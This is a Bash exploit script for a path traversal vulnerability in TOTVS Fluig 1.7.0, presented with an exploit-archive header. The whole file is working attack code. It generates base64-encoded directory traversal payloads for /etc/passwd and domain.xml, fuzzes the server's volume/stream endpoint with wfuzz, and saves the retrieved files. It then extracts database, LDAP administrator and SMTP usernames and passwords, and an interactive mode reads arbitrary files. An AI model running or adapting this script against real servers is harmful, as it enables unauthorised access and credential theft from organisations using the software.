208 lines
No EOL
9.3 KiB
Bash
Executable file
208 lines
No EOL
9.3 KiB
Bash
Executable file
# Exploit Title: Fluig 1.7.0 - Path Traversal
|
|
# Date: 26/11/2020
|
|
# Exploit Author: Lucas Souza
|
|
# Vendor Homepage: https://www.totvs.com/fluig/
|
|
# Version: <== 1.7.0-210217
|
|
# Tested on: 1.7.0-201124
|
|
|
|
#!/bin/bash
|
|
url="$1"
|
|
npayload=$2
|
|
> payload.txt
|
|
curl -s https://raw.githubusercontent.com/lucxssouza/banners/main/xFluig/banner > banner
|
|
# -- FUNCTIONS --
|
|
|
|
function create-payload {
|
|
> wordlist.txt
|
|
count=1
|
|
while [[ $count -le $npayload ]]; do
|
|
# WINDOWS PAYLOAD
|
|
echo "?t=1&vol=Default&id=$count&ver=1000&file=../../../../../../../../../../../../../fluig/appserver/domain/configuration/domain.xml" >> wordlist.txt
|
|
echo "?t=1&vol=Default&id=$count&ver=1000&file=../../../../../../../../../../../../../users/public/desktop/desktop.ini" >> wordlist.txt
|
|
# LINUX PAYLOAD
|
|
echo "?t=1&vol=Default&id=$count&ver=1000&file=../../../../../../../../../../../../../etc/passwd" >> wordlist.txt
|
|
echo "?t=1&vol=Default&id=$count&ver=1000&file=../../../../../../../../../../../../../opt/fluig/appserver/domain/configuration/domain.xml" >> wordlist.txt
|
|
count=$[$count + 1]
|
|
done
|
|
}
|
|
|
|
function manual-mode {
|
|
while :; do
|
|
echo
|
|
echo -e "\033[0;31m[!] VALID MANUAL MODE COMMANDS\033[0m"
|
|
echo
|
|
echo -e "\033[0;32m -[ clear - Clear Screen\033[0m"
|
|
echo -e "\033[0;32m -[ target - Set a target\033[0m"
|
|
echo -e "\033[0;32m -[ director/file - Ex: /etc/passwd\033[0m"
|
|
echo -e "\033[0;32m -[ info - Target info and parse 'domain.xml' file ( require target )\033[0m"
|
|
echo
|
|
echo -n -e "\033[0;31mMANUAL MODE >>\033[0m "; read -r input2
|
|
path=$(echo $input2 | sed 's/\\/\//g' | tr '[:upper:]' '[:lower:]')
|
|
mkfile=$(echo $path | sed 's/\//-/g' | sed 's/-//' | tr '[:upper:]' '[:lower:]')
|
|
if [[ $path == 'info' ]]; then
|
|
clear
|
|
cat banner
|
|
domain-xml
|
|
elif [[ $path == 'clear' ]]; then
|
|
clear
|
|
elif [[ $path == 'target' ]]; then
|
|
XmlPayload=''
|
|
echo
|
|
echo -n -e "\033[0;31mINSERT TARGET >> \033[0m"; read url
|
|
echo -n -e "\033[0;31mWORDLIST SIZE >> \033[0m"; read -i npayload
|
|
enum
|
|
else
|
|
echo
|
|
echo "$param../../../../../../../../../../../../..$path" > wordlist.txt
|
|
wfuzz -z file --zP fn=wordlist.txt,encoder=base64 -c --sc 200 $url/volume/stream/Rmx1aWc=/FUZZ | grep '"' | cut -d':' -f2 | grep 200 | cut -d'"' -f2 > payload.txt
|
|
DirPath=$(head -1 payload.txt)
|
|
if [[ $DirPath == '' ]]; then
|
|
echo
|
|
echo -e ' \033[0;33m[!] COMMAND OR DIRECTORY/FILE NOT FOUND - TYPE HELP\033[0m'
|
|
else
|
|
curl -s $url/volume/stream/Rmx1aWc=/$DirPath > report/$mdr/$mkfile
|
|
echo
|
|
echo -e '\033[0;31m'$path'\033[0m'
|
|
echo
|
|
cat report/$mdr/$mkfile
|
|
echo
|
|
pwd=$(pwd)
|
|
echo
|
|
echo -e '\033[0;33m'[!] FILE SAVE IN, $pwd/report/$mdr/$mkfile'\033[0m'
|
|
fi
|
|
fi
|
|
done
|
|
}
|
|
|
|
function domain-xml {
|
|
domain=$(ls report/$mdr | grep domain.xml)
|
|
if [[ $domain == '' ]]; then
|
|
echo
|
|
echo -e '\033[0;33m[!] DOMAIN.XML FILE NOT FOUND\033[0m'
|
|
else
|
|
echo
|
|
echo -e ' \033[0;32m | TOTVS FLUIG - [+] XML ANALISYS\033[0m'
|
|
echo
|
|
echo -e ' \033[0;33m[!] INFORMATION\033[0m'
|
|
echo
|
|
curl -s -I $url | grep Server
|
|
echo
|
|
echo -e '\033[0;31mTarget\033[0m'
|
|
echo $url
|
|
echo
|
|
echo -e '\033[0;31mPayload plaintext\033[0m'
|
|
echo $XmlPayload | base64 -d
|
|
echo
|
|
echo
|
|
echo -e '\033[0;31mPayload base64 encoded\033[0m'
|
|
echo $XmlPayload
|
|
echo
|
|
echo -e ' \033[0;31m[!] DATABASE CONNECTIONS FOUNDS\033[0m'
|
|
echo
|
|
cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep connection-url | sed 's/<connection-url>/\o033[0;31mDB CONNECT >> \o033[0m/g' | sed 's/<\/connection-url>/ \o033[0;31m<< \o033[0m/g' | sed 's/${env.FLUIG_DATABASE_URL://g' | sed 's/}//g'
|
|
echo
|
|
echo -e ' \033[0;31m[!] USERS/PASSWORDS FOUNDS\033[0m'
|
|
echo
|
|
cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep user-name | sed 's/<user-name>/ \o033[0;31mUSER >> \o033[0m/g' | sed 's/<\/user-name>/ \o033[0;31m<< \o033[0m /g' | sed 's/${env.FLUIG_DATABASE_USER://g' | sed 's/}//g'
|
|
cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep password'>' | sed 's/<password>/\o033[0;31m PASSWORD >> \o033[0m/g' | sed 's/<\/password>/ \o033[0;31m<< \o033[0m/g' | sed 's/${env.FLUIG_DATABASE_PASSWORD://g' | sed 's/}//g'
|
|
echo
|
|
echo -e ' \033[0;31m[!] LDAP INTEGRATIONS\033[0m'
|
|
echo
|
|
cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep ldap:// | sed 's/<module-optionname="java.naming.provider.url"value="/\o033[0;31mDOMAIN SERVER >> \o033[0m/g' | sed 's/"\/>/ \o033[0;31m<< \o033[0m /g'
|
|
cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep baseCtxDN | sed 's/<module-optionname="baseCtxDN"value="/\o033[0;31mDISTINGUISHED NAME >> \o033[0m/g' | sed 's/"\/>/ \o033[0;31m<< \o033[0m /g'
|
|
cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep security.principal | sed 's/<module-optionname="java.naming.security.principal"value="/\o033[0;31mUSER ADMIN >> \o033[0m/g' | sed 's/"\/>/ \o033[0;31m<< \o033[0m /g'
|
|
cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep security.credentials | sed 's/<module-optionname="java.naming.security.credentials"value="/\o033[0;31mPASSWORD >> \o033[0m/g' | sed 's/"\/>/ \o033[0;31m<< \o033[0m /g'
|
|
echo
|
|
echo -e ' \033[0;31m[!] SMTP SETTINGS\033[0m'
|
|
echo
|
|
cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep remote-destination | sed 's/<remote-destinationhost="/\o033[0;31mSMTP ADDRESS >> \o033[0m/g' | sed 's/\/>/ \o033[0;31m<< \o033[0m /g' | sed 's/${env.FLUIG_SMTP_HOST://g' | sed 's/${env.FLUIG_HOST_ADDRESS://g' | sed 's/${env.FLUIG_SMTP_PORT//g'| sed 's/}//g'
|
|
cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep smtp-server | sed 's/<smtp-serveroutbound-socket-binding-ref="mail-smtp"//g' | sed 's/\/>//g' | sed 's/password="/\o033[0;31mPASSWORD >> \o033[0m/g' | sed 's/"username="/\o033[0;31m USER >> \o033[0m/g' | sed 's/}//g' | sed 's/${env.FLUIG_SMTP_USERNAME://g' | sed 's/${env.FLUIG_SMTP_PASSWORD://g'
|
|
echo
|
|
manual-mode
|
|
fi
|
|
}
|
|
|
|
function enum {
|
|
mdr=$(echo $url | sed 's/https:\/\///' | sed 's/http:\/\///' | sed 's/\///')
|
|
mkdir -p report/$mdr
|
|
if [[ $url == '' ]]; then
|
|
clear
|
|
cat banner
|
|
echo -e ' \033[0;31m-[ Usage Ex1: ./xfluig.sh FLUIG_ADDRESS REQUESTS_WFUZZ\033[0m'
|
|
echo -e ' \033[0;31m-[ Ex2: ./xfluig.sh FLUIG_ADDRESS:PORT REQUESTS_WFUZZ\033[0m'
|
|
echo -e ' \033[0;31m-[ ( ./xfluig.sh fluig.host.com:8080 1000 )\033[0m'
|
|
manual-mode
|
|
elif [[ $npayload == '' ]]; then
|
|
npayload=25
|
|
clear
|
|
cat banner
|
|
echo -e ' \033[0;32m | TOTVS FLUIG - [+] PATH ENUMERATION\033[0m'
|
|
echo
|
|
echo -e '\033[0;31m[>>] GENERATING PAYLOAD WORDLIST\033[0m'
|
|
echo
|
|
create-payload
|
|
else
|
|
clear
|
|
cat banner
|
|
echo -e ' \033[0;32m | TOTVS FLUIG - [+] PATH ENUMERATION\033[0m'
|
|
echo
|
|
echo -e '\033[0;31m[>>] GENERATING PAYLOAD WORDLIST\033[0m'
|
|
create-payload
|
|
fi
|
|
echo
|
|
echo -e '\033[0;31m[>>] RUNNING WFUZZ - WAIT\033[0m'
|
|
echo
|
|
wfuzz -z file --zP fn=wordlist.txt,encoder=base64 -c --sc 200 $url/volume/stream/Rmx1aWc=/FUZZ | grep '"' | cut -d':' -f3 | grep 200 | cut -d'"' -f2 > payload.txt
|
|
payload=$(head -1 payload.txt)
|
|
if [[ $payload == '' ]]; then
|
|
clear
|
|
cat banner
|
|
echo -e ' \033[0;32m | TOTVS FLUIG - PATH ENUMERATION AND XML ANALISYS \033[0m'
|
|
echo
|
|
echo -e '\033[0;33m[!] DIRECTORY/FILE NOT FOUND OR TARGET NOT VULNERABLE\033[0m'
|
|
echo
|
|
manual-mode
|
|
else
|
|
param=$(echo $payload | base64 -d | cut -d '.' -f1)
|
|
clear
|
|
cat banner
|
|
echo -e ' \033[0;32m | TOTVS FLUIG - [+] STATUS\033[0m'
|
|
echo
|
|
echo -e ' \033[0;33m[!] VULNERABLE\033[0m'
|
|
echo
|
|
echo -e '\033[0;31m[>>] SEARCHING DOMAIN.XML FILE\033[0m'
|
|
echo "$param../../../../../../../../../../../../../fluig/appserver/domain/configuration/domain.xml" > wordlist.txt
|
|
echo "$param../../../../../../../../../../../../../opt/fluig/appserver/domain/configuration/domain.xml" >> wordlist.txt
|
|
wfuzz -z file --zP fn=wordlist.txt,encoder=base64 -c --sc 200 $url/volume/stream/Rmx1aWc=/FUZZ | grep '"' | cut -d':' -f3 | grep 200 | cut -d'"' -f2 > payload.txt
|
|
clear
|
|
cat banner
|
|
echo -e ' \033[0;32m | TOTVS FLUIG - [+] STATUS\033[0m'
|
|
echo
|
|
echo -e ' \033[0;33m[!] VULNERABLE\033[0m'
|
|
echo
|
|
curl -s -I $url | grep Server
|
|
echo
|
|
echo -e '\033[0;31mTarget\033[0m'
|
|
echo $url
|
|
echo
|
|
echo -e '\033[0;31mPayload plaintext\033[0m'
|
|
echo $payload | base64 -d
|
|
echo
|
|
echo
|
|
echo -e '\033[0;31mPayload base64 encoded\033[0m'
|
|
echo $payload
|
|
echo
|
|
fi
|
|
XmlPayload=$(head -1 payload.txt)
|
|
if [[ $XmlPayload == '' ]]; then
|
|
echo
|
|
echo -e '\033[0;33m[!] DOMAIN.XML FILE NOT FOUND\033[0m'
|
|
manual-mode
|
|
else
|
|
curl -s $url/volume/stream/Rmx1aWc=/$XmlPayload | sed 's/[[:blank:]]//g' > report/$mdr/domain.xml
|
|
echo
|
|
echo -e '\033[0;33m[!] DOMAIN.XML FILE FOUND - TYPE "INFO" TO PARSE\033[0m'
|
|
manual-mode
|
|
fi
|
|
}
|
|
enum |